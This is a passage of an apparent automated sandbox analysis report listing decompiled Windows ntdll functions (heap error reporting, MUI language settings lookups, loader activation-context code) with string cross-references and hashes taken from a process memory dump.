                                      Non-executed Functions

                                      Function 053FB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                      Download Yara Rule
                                      Strings
                                      • write to, xrefs: 053FB4A6
                                      • *** Inpage error in %ws:%s, xrefs: 053FB418
                                      • read from, xrefs: 053FB4AD, 053FB4B2
                                      • The critical section is owned by thread %p., xrefs: 053FB3B9
                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 053FB484
                                      • The instruction at %p tried to %s , xrefs: 053FB4B6
                                      • a NULL pointer, xrefs: 053FB4E0
                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 053FB47D
                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 053FB2DC
                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 053FB305
                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053FB3D6
                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 053FB352
                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 053FB53F
                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 053FB314
                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 053FB39B
                                      • *** An Access Violation occurred in %ws:%s, xrefs: 053FB48F
                                      • This failed because of error %Ix., xrefs: 053FB446
                                      • <unknown>, xrefs: 053FB27E, 053FB2D1, 053FB350, 053FB399, 053FB417, 053FB48E
                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053FB38F
                                      • The resource is owned exclusively by thread %p, xrefs: 053FB374
                                      • The instruction at %p referenced memory at %p., xrefs: 053FB432
                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 053FB323
                                      • *** enter .exr %p for the exception record, xrefs: 053FB4F1
                                      • *** then kb to get the faulting stack, xrefs: 053FB51C
                                      • *** enter .cxr %p for the context, xrefs: 053FB50D
                                      • Go determine why that thread has not released the critical section., xrefs: 053FB3C5
                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 053FB476
                                      • The resource is owned shared by %d threads, xrefs: 053FB37E
                                      • an invalid address, %p, xrefs: 053FB4CF
                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 053FB2F3
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                      • API String ID: 0-108210295
                                      • Opcode ID: 0d1158c2afa861916aee1abddf2aaba280b301ffd1beaabd907fbbd59e68981b
                                      • Instruction ID: c408d66608014e5b4656f895029edb9d3065e400f0adf82947fe0af76d15eba5
                                      • Opcode Fuzzy Hash: 0d1158c2afa861916aee1abddf2aaba280b301ffd1beaabd907fbbd59e68981b
                                      • Instruction Fuzzy Hash: 52812BB6B40210FFCB259B05DCDAE7BBB3AEF46A92F404045F6045B121D3B58561E772
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05401C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E05401C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x53248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0534B150();
				} else {
					E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x543589c);
				E0534B150("Heap error detected at %p (heap handle %p)\n",  *0x54358a0);
				_t27 =  *0x5435898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05401E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0534B150();
				} else {
					E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0534B150("Error code: %d - %s\n",  *0x5435898);
				_t113 =  *0x54358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0534B150();
					} else {
						E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0534B150("Parameter1: %p\n",  *0x54358a4);
				}
				_t115 =  *0x54358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0534B150();
					} else {
						E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0534B150("Parameter2: %p\n",  *0x54358a8);
				}
				_t117 =  *0x54358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0534B150();
					} else {
						E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0534B150("Parameter3: %p\n",  *0x54358ac);
				}
				_t119 =  *0x54358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0534B150();
					} else {
						E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x54358b4);
					E0534B150("Last known valid blocks: before - %p, after - %p\n",  *0x54358b0);
				} else {
					_t120 =  *0x54358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0534B150();
				} else {
					E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0534B150("Stack trace available at %p\n", 0x54358c0);
			}











                                      0x05401c10
                                      0x05401c16
                                      0x05401c1e
                                      0x05401c3d
                                      0x05401c3e
                                      0x05401c20
                                      0x05401c35
                                      0x05401c3a
                                      0x05401c44
                                      0x05401c55
                                      0x05401c5a
                                      0x05401c65
                                      0x05401c67
                                      0x00000000
                                      0x05401c6e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05401c67
                                      0x05401cdc
                                      0x05401ce5
                                      0x05401d04
                                      0x05401d05
                                      0x05401ce7
                                      0x05401cfc
                                      0x05401d01
                                      0x05401d0b
                                      0x05401d17
                                      0x05401d1f
                                      0x05401d25
                                      0x05401d30
                                      0x05401d4f
                                      0x05401d50
                                      0x05401d32
                                      0x05401d47
                                      0x05401d4c
                                      0x05401d61
                                      0x05401d67
                                      0x05401d68
                                      0x05401d6e
                                      0x05401d79
                                      0x05401d98
                                      0x05401d99
                                      0x05401d7b
                                      0x05401d90
                                      0x05401d95
                                      0x05401daa
                                      0x05401db0
                                      0x05401db1
                                      0x05401db7
                                      0x05401dc2
                                      0x05401de1
                                      0x05401de2
                                      0x05401dc4
                                      0x05401dd9
                                      0x05401dde
                                      0x05401df3
                                      0x05401df9
                                      0x05401dfa
                                      0x05401e00
                                      0x05401e0a
                                      0x05401e13
                                      0x05401e32
                                      0x05401e33
                                      0x05401e15
                                      0x05401e2a
                                      0x05401e2f
                                      0x05401e39
                                      0x05401e4a
                                      0x05401e02
                                      0x05401e02
                                      0x05401e08
                                      0x00000000
                                      0x00000000
                                      0x05401e08
                                      0x05401e5b
                                      0x05401e7a
                                      0x05401e7b
                                      0x05401e5d
                                      0x05401e72
                                      0x05401e77
                                      0x05401e95

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                      • API String ID: 0-2897834094
                                      • Opcode ID: ccb59e57185aece8fd4752e7bc2c7d22a7422cee3663a440c18a58dd4bf639cd
                                      • Instruction ID: 99cf6cecac9c904356b5b9457c923035420a6df18b5e00bd43a20bb8f637b73b
                                      • Opcode Fuzzy Hash: ccb59e57185aece8fd4752e7bc2c7d22a7422cee3663a440c18a58dd4bf639cd
                                      • Instruction Fuzzy Hash: 3561E636618540DFC7559B54D89AEA6B3F9EF04A30B29A07BF40E5B390CA30E851EE09
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05353D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E05353D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E05351B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E05351B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E05351B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E05351B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E05351B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L05364620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0538F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05391370(_t276, 0x5324e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0538BB40(0,  &_v68, _t170);
									if(L053543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0538BB40(_t257,  &_v68, _t243);
								if(L053543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05391370(_t278, 0x5324e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L05364620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0538F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05391370(_v16, 0x5324e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0538BB40(_t262,  &_v68, _t244);
								if(L053543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05391370(_t282, 0x5324e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0538BB40(_t262,  &_v68, _t201);
							if(L053543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L05364620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0538F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05391370(_t280, 0x5324e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0538BB40(_t267,  &_v68, _t245);
							if(L053543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05391370(_t284, 0x5324e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0538BB40(_t267,  &_v68, _t224);
						if(L053543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                      0x05353d3c
                                      0x05353d42
                                      0x05353d44
                                      0x05353d46
                                      0x05353d49
                                      0x05353d4c
                                      0x05353d4f
                                      0x05353d52
                                      0x05353d55
                                      0x05353d58
                                      0x05353d5b
                                      0x05353d5f
                                      0x05353d61
                                      0x05353d66
                                      0x053a8213
                                      0x053a8218
                                      0x05354085
                                      0x05354088
                                      0x0535408e
                                      0x05354094
                                      0x0535409a
                                      0x053540a0
                                      0x053540a6
                                      0x053540a9
                                      0x053540af
                                      0x053540b6
                                      0x053540bd
                                      0x053540bd
                                      0x05353d83
                                      0x053a821f
                                      0x053a8229
                                      0x053a8238
                                      0x053a8238
                                      0x053a823d
                                      0x053a823d
                                      0x05353da0
                                      0x05353daf
                                      0x05353db5
                                      0x05353dba
                                      0x05353dba
                                      0x05353dd4
                                      0x05353e94
                                      0x05353eab
                                      0x05353f6d
                                      0x05353f84
                                      0x0535406b
                                      0x0535406b
                                      0x0535406e
                                      0x0535406e
                                      0x05354070
                                      0x05354074
                                      0x053a8351
                                      0x053a8351
                                      0x0535407a
                                      0x0535407f
                                      0x053a835d
                                      0x053a8370
                                      0x053a8377
                                      0x053a8379
                                      0x053a837c
                                      0x053a837c
                                      0x053a835d
                                      0x00000000
                                      0x0535407f
                                      0x05353f8a
                                      0x05353f8d
                                      0x05353f90
                                      0x05353f95
                                      0x053a830d
                                      0x053a830f
                                      0x05353f9b
                                      0x05353fac
                                      0x05353fae
                                      0x05353fb1
                                      0x05353fb1
                                      0x05353fb6
                                      0x053a8317
                                      0x053a831a
                                      0x00000000
                                      0x05353fbc
                                      0x05353fc1
                                      0x05353fc9
                                      0x05353fd7
                                      0x05353fda
                                      0x05353fdd
                                      0x05354021
                                      0x05354021
                                      0x05354029
                                      0x05354030
                                      0x05354044
                                      0x05354046
                                      0x05354046
                                      0x05354044
                                      0x05354049
                                      0x053a8327
                                      0x053a8334
                                      0x053a8339
                                      0x053a833c
                                      0x0535404f
                                      0x0535404f
                                      0x0535404f
                                      0x05354051
                                      0x05354056
                                      0x05354063
                                      0x05354063
                                      0x05354068
                                      0x00000000
                                      0x05354068
                                      0x05353fdf
                                      0x05353fe2
                                      0x05353fe4
                                      0x05353fe7
                                      0x05353fef
                                      0x05354003
                                      0x05354005
                                      0x05354005
                                      0x0535400c
                                      0x05354013
                                      0x05354016
                                      0x05354017
                                      0x0535401b
                                      0x0535401e
                                      0x00000000
                                      0x0535401e
                                      0x05353fb6
                                      0x05353eb1
                                      0x05353eb4
                                      0x05353eb7
                                      0x05353ebc
                                      0x053a82a9
                                      0x053a82ab
                                      0x05353ec2
                                      0x05353ed3
                                      0x05353ed5
                                      0x05353ed8
                                      0x05353ed8
                                      0x05353edd
                                      0x053a82b3
                                      0x053a82b6
                                      0x00000000
                                      0x05353ee3
                                      0x05353ee8
                                      0x05353eed
                                      0x05353ef0
                                      0x05353ef3
                                      0x05353f02
                                      0x05353f05
                                      0x05353f08
                                      0x053a82c0
                                      0x053a82c3
                                      0x053a82c5
                                      0x053a82c8
                                      0x053a82d0
                                      0x053a82e4
                                      0x053a82e6
                                      0x053a82e6
                                      0x053a82ed
                                      0x053a82f4
                                      0x053a82f7
                                      0x053a82f8
                                      0x053a82fc
                                      0x053a82ff
                                      0x053a82ff
                                      0x05353f0e
                                      0x05353f11
                                      0x05353f16
                                      0x05353f1d
                                      0x05353f31
                                      0x053a8307
                                      0x053a8307
                                      0x05353f31
                                      0x05353f39
                                      0x05353f48
                                      0x05353f4d
                                      0x05353f50
                                      0x05353f50
                                      0x05353f53
                                      0x05353f58
                                      0x05353f65
                                      0x05353f65
                                      0x05353f6a
                                      0x00000000
                                      0x05353f6a
                                      0x05353edd
                                      0x05353dda
                                      0x05353ddd
                                      0x05353de0
                                      0x05353de5
                                      0x053a8245
                                      0x05353deb
                                      0x05353df7
                                      0x05353dfc
                                      0x05353dfe
                                      0x05353e01
                                      0x05353e01
                                      0x05353e06
                                      0x053a824d
                                      0x053a824f
                                      0x053a8254
                                      0x00000000
                                      0x05353e0c
                                      0x05353e11
                                      0x05353e16
                                      0x05353e19
                                      0x05353e29
                                      0x05353e2c
                                      0x05353e2f
                                      0x053a825c
                                      0x053a825f
                                      0x053a8261
                                      0x053a8264
                                      0x053a826c
                                      0x053a8280
                                      0x053a8282
                                      0x053a8282
                                      0x053a8289
                                      0x053a8290
                                      0x053a8293
                                      0x053a8294
                                      0x053a8298
                                      0x053a829b
                                      0x053a829b
                                      0x05353e35
                                      0x05353e38
                                      0x05353e3d
                                      0x05353e44
                                      0x05353e58
                                      0x053a82a3
                                      0x053a82a3
                                      0x05353e58
                                      0x05353e60
                                      0x05353e6f
                                      0x05353e74
                                      0x05353e77
                                      0x05353e77
                                      0x05353e7a
                                      0x05353e7f
                                      0x05353e8c
                                      0x05353e8c
                                      0x05353e91
                                      0x00000000
                                      0x05353e91

                                      Strings
                                      • Kernel-MUI-Language-SKU, xrefs: 05353F70
                                      • WindowsExcludedProcs, xrefs: 05353D6F
                                      • Kernel-MUI-Language-Allowed, xrefs: 05353DC0
                                      • Kernel-MUI-Language-Disallowed, xrefs: 05353E97
                                      • Kernel-MUI-Number-Allowed, xrefs: 05353D8C
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      • Opcode ID: c8a1572ed29d202ec3086f2c64f762b7cc5e03acb0f7e37fa8acf68fa29cafea
                                      • Instruction ID: c4fe56e264b9e307225d3c8d094b7a8ebdc30d7b759c132bdfaf5b437afd4399
                                      • Opcode Fuzzy Hash: c8a1572ed29d202ec3086f2c64f762b7cc5e03acb0f7e37fa8acf68fa29cafea
                                      • Instruction Fuzzy Hash: C5F13872E00619EBCF15DF98C984EEEBBB9FF48650F14406AE905E7250E7749E41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053440E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 29%
                                      			E053440E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0534B150();
					} else {
						E0534B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0534B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0534B150(", passed to %s", _t29);
					}
					_push("\n");
					E0534B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x5436378 = 1;
						asm("int3");
						 *0x5436378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                      0x053440e6
                                      0x053440e8
                                      0x053440f1
                                      0x053a042d
                                      0x053a044c
                                      0x053a0451
                                      0x053a042f
                                      0x053a0444
                                      0x053a0449
                                      0x053a045d
                                      0x053a0466
                                      0x053a046e
                                      0x053a0474
                                      0x053a0475
                                      0x053a047a
                                      0x053a048a
                                      0x053a048c
                                      0x053a0493
                                      0x053a0494
                                      0x053a0494
                                      0x00000000
                                      0x053a049b
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                      • API String ID: 0-188067316
                                      • Opcode ID: 40149ef02b7540c3f3265dc7aa5a1b2d064bb2346213db8679148c0646d73308
                                      • Instruction ID: 27cfb9ef1bf56b2b46d0b0c98424e961e79be4da2e1c4de2f3eed63dde67639a
                                      • Opcode Fuzzy Hash: 40149ef02b7540c3f3265dc7aa5a1b2d064bb2346213db8679148c0646d73308
                                      • Instruction Fuzzy Hash: 7C01D833219650AED71D9B75A41FF92B7E8EF41B30F294069F00547741CFF5A440D911
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05378E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E05378E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x543d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5438464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5435780 & 0x00000003) != 0) {
							E053C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5435780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0538B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5437984; // 0x3591dd8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
